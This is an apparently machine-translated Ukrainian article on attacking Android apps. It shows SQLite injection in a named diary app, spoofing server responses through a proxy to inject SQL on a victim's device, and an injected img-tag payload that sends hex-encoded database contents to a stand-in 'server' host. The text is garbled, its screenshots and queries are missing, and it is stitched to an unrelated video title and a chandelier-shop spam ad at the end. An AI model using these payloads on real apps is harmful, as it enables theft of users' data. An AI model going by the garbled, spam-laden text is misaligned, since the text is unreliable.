Баги в додатках для android: sqlite-inj в додатку і spoofing

Відео: ЯК СИДІТИ ОФЛАЙН ВКОНТАКТЕ З ANDROID ЧЕРЕЗ ОФІЦІЙНЕ Додаток | НЕВИДИМКА ВК | БАГІ, СЕКРЕТИ

Зазвичай для зберігання даних додаток використовує або SQLite-таблиці, або XML-файли. Щоб знайти файли певного додатка, потрібно звернутися за адресою / data / data /% app_name% /.

Розглянемо докладніше атаку на додаток з використанням SQLite injection. Знайти вразливе додаток досить просто, так само як і зі звичайними SQL inj, тільки додаток при підстановці лапки в уразливе поле завершиться з помилкою, а в консолі можна побачити докладний звіт про SQL-помилку. Вивчаючи вихідний код програми, не варто забувати про небезпечні ділянки при роботі з базою даних, наприклад підстановці змінних безпосередньо в запит.

Від теорії перейдемо до практики. Я взяв перший додаток, яке знайшов за запитом Diary. Ця програма itesta.Diaro (https: // play. Google.com/store/apps/detai ls? Id = itesta.Diaro).
Вразливість є в запиті пошуку заміток. Весь запит:



Як це виглядає в вихідному коді, можна побачити на скріншоті. Легко скласти Blind SQL injection:

Так як в Android-додатках використовується база даних SQLite, то можна зробити запит SELECT * FROM sqlite_master - і отримати всю структуру.

ТИП 4. SPOOFING
Тепер перейдемо до Спуфінга контенту. Для пентеста додатків під Android раджу використовувати Android SDK і давно знайомий нам Burp. Якщо перенаправити весь трафік Android-системи, запущеної під емулятором, на проксі, то можна змінювати пакети, які відправляються пристроєм і приходять на нього:




Для прикладу можна замінити вміст відповіді на запит адреси ya.ru.

Тепер для чого нам може це знадобитися. В реальних умовах спуфинг можна провести за допомогою спеціалізованих утиліт на зразок Ettercap. Припустимо, що у нас є програма, яка отримує дані з зовнішнього джерела і записує їх в базу. Розробники часто забувають про це і можуть припуститися помилки, склавши запит з уразливістю. Таким чином, підміняючи відповідь сервера на потрібний нам SQL inj, ми можемо проводити різні операції на пристрої жертви.

Також часто хочеться побачити відповідь самого пристрою на відправлений SQL-запит.

Для цього існує маленька хитрість. Вона полягає в тому, що розробники все частіше і частіше використовують в своїх додатках HTML-коди для розмітки. За їх використання відповідає клас WebView. В Android використовується движок WebKit для обробки HTML. За замовчуванням javascript в класі WebView не включений, але нам він і не знадобиться. Техніка буде аналогічна тій, що використовується в сніффером. У нас є сервер, який записує в лог все, що після?. Таким чином, ми формуємо запит, щоб він виводив у відповідь «[... img] http: // server /? 41 [/ img]»: в даному випадку це запит «SELECT X`3c `||` img src = http: // server /? `|| hex (` A `) || X`3e`- ».


Звичайно, це всього лише мала частина того, як можна проводити пентест Android-додатків. На завершення статті приведу нереалізовані концепти атак: SQLite load_ extension (), динамічне завантаження сторонніх бібліотек і подгрузка сторонніх БД. Постараємося розглянути їх в іншій статті. Крім того, в одному з наступних номерів буде опублікований звіт про уразливість, знайдених в рамках конкурсу «Полювання за помилками» від компанії «Яндекс».

---

Ваша першочергова задача - купити китайську люстру в інтернеті (https://lampsaz.ua/index.php/kitaiskie_ljustry/), а вже після Ви будете займатися пошуком багів в додатках для Android! І саме тому Вам слід заглянути на lampsaz.ua, де представлений широкий асортимент люстр на будь-який смак і гаманець!